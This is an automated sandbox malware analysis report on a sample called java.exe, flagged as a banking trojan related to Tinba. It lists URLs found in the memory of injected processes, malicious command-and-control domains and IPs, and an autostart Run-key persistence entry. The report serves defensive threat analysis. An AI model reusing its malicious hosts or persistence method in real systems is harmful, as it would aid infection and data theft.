                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1933132623.0000024B58760000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845864904.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1884964111.0000024B55240000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://%s.xboxlive.comsvchost.exe, 00000005.00000000.1792057093.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2991250120.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		low
                                                                          https://outlook.comStartMenuExperienceHost.exe, 00000009.00000000.1801563347.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2989471561.000001B9814D0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://substrate.office.comSearchApp.exe, 0000000B.00000000.1887670634.0000024B5542F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1888726531.0000024B554A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://login.windows.net/svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://powerpoint.office.comxeeStartMenuExperienceHost.exe, 00000009.00000000.1801470015.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2985059501.000001B98144E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://outlook.com_explorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		low
                                                                                        https://rafd.https://r.aSearchApp.exe, 0000000B.00000000.1848016538.0000024B4434A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://xsts.auth.xboxlive.com/svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://login.windows.netsvchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1840976922.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://powerpoint.office.comcemberexplorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://xsts.auth.xboxlive.comsvchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845305822.0000024B4402B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1840976922.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.microexplorer.exe, 00000003.00000000.1714711719.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1716586529.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1715110391.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000A.00000002.3035088754.000001ECFC470000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://outlook.office.com/SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1933132623.0000024B58760000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845864904.0000024B44184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://login.windows.localsvchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://www.ng.comSearchApp.exe, 0000000B.00000000.1840976922.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://outlook.office.com/User.ReadWriteSearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://substrate.office.com/imageB2/v1.0/users/SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1933132623.0000024B58760000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1845864904.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1884964111.0000024B55240000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/SearchApp.exe, 0000000B.00000000.1879521352.0000024B54E44000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://api.msn.com/qexplorer.exe, 00000003.00000000.1715884676.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://substrate.office.com/search/apiSearchApp.exe, 0000000B.00000000.1848683308.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://xsts.auth.xboxlive.commSearchApp.exe, 0000000B.00000000.1845305822.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://raka.rms_noco-VKSearchApp.exe, 0000000B.00000000.1848016538.0000024B4434A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		low
                                                                                                                                    https://loki.delve.office.com/apiSearchApp.exe, 0000000B.00000000.1848683308.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://searchapp.bundleassets.example/desktop/2.htmlSearchApp.exe, 0000000B.00000000.1834242505.0000024B41E30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://assets.activity.windows.comersvchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmSearchApp.exe, 0000000B.00000000.1884964111.0000024B55240000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://reactjs.org/docs/error-decoder.html?invariant=SearchApp.exe, 0000000B.00000000.1878822933.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://assets.activity.windows.comssvchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://aefd.nelreports.net/api/report?cat=wsbSearchApp.exe, 0000000B.00000000.1840976922.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://activity.windows.comtsvchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://login.windows.local/svchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://aka.ms/Vh5j3kexplorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000003.00000002.3084368988.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1715884676.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://fb.me/react-polyfillsSearchApp.exe, 0000000B.00000000.1878822933.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://api.msn.com/explorer.exe, 00000003.00000000.1715884676.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://assets.activity.windows.comsvchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://activity.windows.comsvchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://excel.office.comcpStartMenuExperienceHost.exe, 00000009.00000000.1801470015.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2985059501.000001B98144E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.msn.com:443/en-us/feedexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://assets.activity.windows.com/v1/assets/$batchsvchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://%s.dnet.xboxlive.comsvchost.exe, 00000005.00000000.1792057093.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2991250120.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      		low

                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                      Public IPs

                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                      216.218.185.162
                                                                                                                                                                      		vcklmnnejwxx.pwUnited States
                                                                                                                                                                      		6939HURRICANEUStrue
                                                                                                                                                                      104.131.68.180
                                                                                                                                                                      		uyhgqunqkxnx.pwUnited States
                                                                                                                                                                      		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                      173.222.162.32
                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                      		35994AKAMAI-ASUSfalse

                                                                                                                                                                      General Information

                                                                                                                                                                      Joe Sandbox version:38.0.0 Ammolite
                                                                                                                                                                      Analysis ID:1364228
                                                                                                                                                                      Start date and time:2023-12-19 00:40:08 +01:00
                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                      Overall analysis duration:0h 9m 47s
                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                      Report type:full
                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                      Number of analysed new started processes analysed:10
                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                      Number of injected processes analysed:35
                                                                                                                                                                      Technologies:
                                                                                                                                                                      • HCA enabled
                                                                                                                                                                      • EGA enabled
                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                      Sample name:java.exe
                                                                                                                                                                      Detection:MAL
                                                                                                                                                                      Classification:mal100.bank.expl.evad.winEXE@10/10@4/3
                                                                                                                                                                      EGA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 95%
                                                                                                                                                                      • Number of executed functions: 123
                                                                                                                                                                      • Number of non-executed functions: 68
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                                      Warnings

                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                      • VT rate limit hit for: java.exe

                                                                                                                                                                      Simulations

                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                      00:41:03API Interceptor581x Sleep call for process: explorer.exe modified
                                                                                                                                                                      00:41:10API Interceptor1x Sleep call for process: winver.exe modified
                                                                                                                                                                      23:41:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run E38A1E29 C:\Users\user\AppData\Roaming\E38A1E29\bin.exe
                                                                                                                                                                      23:41:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run E38A1E29 C:\Users\user\AppData\Roaming\E38A1E29\bin.exe

                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                      IPs

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      216.218.185.1623G36K54KKw.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • ve0t182er814kok.cc/vet0up7gj67sdhjd17up0er/
                                                                                                                                                                      http://hbjtorutqkl.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • hbjtorutqkl.org/
                                                                                                                                                                      http://www.paypr.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • www.paypr.com/
                                                                                                                                                                      Fxj6eiNUQ1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • mypark.cc/qa/
                                                                                                                                                                      1boDHMvtCl.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • vcklmnnejwxx.pw/EiDQjNbWEQ/
                                                                                                                                                                      N7B5dyjbIS.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • vcklmnnejwxx.pw/EiDQjNbWEQ/
                                                                                                                                                                      bhiDwU4Geh.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • qvvksmeemfgd.com/spam/
                                                                                                                                                                      K73CgOgVZ9.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • qvvksmeemfgd.com/spam/
                                                                                                                                                                      I90gcqKK3m.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • ggvruxovlbrm.com/spam/
                                                                                                                                                                      KlNXUPV2V9.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • qvvksmeemfgd.com/spam/
                                                                                                                                                                      26cCgegATh.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • spaines.pw/EiDQjNbWEQ/
                                                                                                                                                                      4jNfjcMzST.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • spaines.pw/EiDQjNbWEQ/
                                                                                                                                                                      PFubud554p.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • vcklmnnejwxx.pw/EiDQjNbWEQ/
                                                                                                                                                                      xST04RvuDH.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • spaines.pw/EiDQjNbWEQ/
                                                                                                                                                                      rTv7jUz1P5.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • spaines.pw/EiDQjNbWEQ/
                                                                                                                                                                      6phPAtxcUR.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • cmnsgscccrej.pw/EiDQjNbWEQ/
                                                                                                                                                                      IPwhmF3OZ3.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • vcklmnnejwxx.pw/EiDQjNbWEQ/
                                                                                                                                                                      sZ8q0q3VNz.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • vcklmnnejwxx.pw/EiDQjNbWEQ/
                                                                                                                                                                      W7jhZtyX7H.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • spaines.pw/EiDQjNbWEQ/
                                                                                                                                                                      j6qWx4m2sT.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                      • spaines.pw/EiDQjNbWEQ/
                                                                                                                                                                      173.222.162.32p2pWin.exeGet hashmaliciousPetya / NotPetya, MimikatzBrowse

                                                                                                                                                                        Domains

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        uyhgqunqkxnx.pw1boDHMvtCl.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                        • 192.42.116.41
                                                                                                                                                                        N7B5dyjbIS.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                        • 192.42.116.41
                                                                                                                                                                        PFubud554p.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                        • 192.42.116.41
                                                                                                                                                                        6phPAtxcUR.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                        • 192.42.116.41
                                                                                                                                                                        IPwhmF3OZ3.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                        • 192.42.116.41
